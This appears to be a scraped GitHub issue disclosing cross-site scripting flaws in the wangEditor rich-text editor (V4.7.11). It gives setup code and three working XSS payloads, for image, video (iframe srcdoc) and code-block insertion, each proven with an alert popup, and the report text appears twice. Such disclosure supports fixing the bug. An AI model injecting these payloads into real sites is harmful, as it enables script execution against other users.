You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
<script type="text/javascript" src="https://unpkg.com/wangeditor/dist/wangEditor.min.js"></script>
<span class="col-lg-8" id="editor"></span>
<script type="text/javascript">
const E = window.wangEditor
const editor = new E('#editor')
editor.create()
</script>
2.Access the location where the image is inserted
payload: "><img src=1 onerror=alert(/xss/)>
Successfully trigger the XSS vulnerability popup
3.Access the location where the video was inserted
payload:
<iframe srcdoc="<script>alert(/xss/)</script>">
Successfully trigger the XSS vulnerability popup
4.Access the location where the code was inserted
payload: </xmp></code></pre><img src=1 onerror=alert(/xss/)>
Successfully trigger the XSS vulnerability popup
The text was updated successfully, but these errors were encountered:
The function points are different (#3870 function point is at the image upload, and #3872 has 3 different function points), so I don't think this is a duplicate.
bug
XSS vulnerability
wangEditor version
V4.7.11
Can the official website reproduce the loopholes ?
Yes
Reproduction steps
1.Use the following code to build the environment or on the official demo website(https://codepen.io/xiaokyo-the-bold/pen/ZEpWByR)
2.Access the location where the image is inserted
payload:
"><img src=1 onerror=alert(/xss/)>
Successfully trigger the XSS vulnerability popup
3.Access the location where the video was inserted
payload:
Successfully trigger the XSS vulnerability popup
4.Access the location where the code was inserted
payload:
</xmp></code></pre><img src=1 onerror=alert(/xss/)>
Successfully trigger the XSS vulnerability popup
The text was updated successfully, but these errors were encountered: